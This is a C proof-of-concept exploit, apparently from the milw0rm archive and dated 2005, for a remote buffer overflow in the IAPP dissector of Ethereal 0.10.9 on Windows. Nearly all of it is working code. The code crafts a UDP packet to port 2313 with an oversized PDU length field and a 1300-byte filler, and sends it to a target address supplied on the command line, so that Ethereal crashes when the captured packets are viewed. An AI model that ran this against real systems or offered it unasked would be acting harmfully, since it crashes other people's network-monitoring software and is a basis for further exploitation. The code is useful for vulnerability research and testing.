Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow

/*
 * 
 * Ethereal IAPP remote buffer overflow #2 PoC exploit 
 * ---------------------------------------------------
 * To test this vulnerability on windows, try to send 3-10 packets 
 * that will trigger the crash, and scroll between captured packets
 * in Ethereal.
 * 
 * Coded by Leon Juranic <[email protected]> 
 * LSS Security <http://security.lss.hr/en/>
 * 
 */ 

#include <stdio.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

#define IAPP_PDU_SSID 0

typedef struct _e_iapphdr {
        unsigned char ia_version;
        unsigned char ia_type;
} e_iapphdr;


typedef struct _e_pduhdr {
	unsigned char pdu_type;
	unsigned char pdu_len_h;
	unsigned char pdu_len_l;
} e_pduhdr;


void xp_sendpacket (char *pack)
{
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	int sock,i;
	struct sockaddr_in sin;
	unsigned char buf[2000];
	char bla[2000];
	e_iapphdr *iapp;
	e_pduhdr *pdu;

	wVersionRequested = MAKEWORD( 2, 2 );
	err = WSAStartup( wVersionRequested, &wsaData );
	if ( err != 0 ) {
		printf ("error!!!\n");
		ExitProcess(-1);
	}

	sock=socket(AF_INET,SOCK_DGRAM,0);

	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr = inet_addr(pack);
	sin.sin_port = htons(2313);

	iapp = (e_iapphdr*)&buf;
	iapp->ia_version = 1;
	iapp->ia_type = 1;
	
	pdu  = (e_pduhdr*)(buf+2);
	pdu->pdu_type = 3; 
	pdu->pdu_len_h = 0x05;    
	pdu->pdu_len_l = 0xa1;
	
	memset (bla,'\xfc',1300); 
	strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);
	
//	for (i=0;i<1000;i++)
	sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));

}


main (int argc, char **argv)
{
	
	xp_sendpacket(argv[1]);
}

// milw0rm.com [2005-03-12]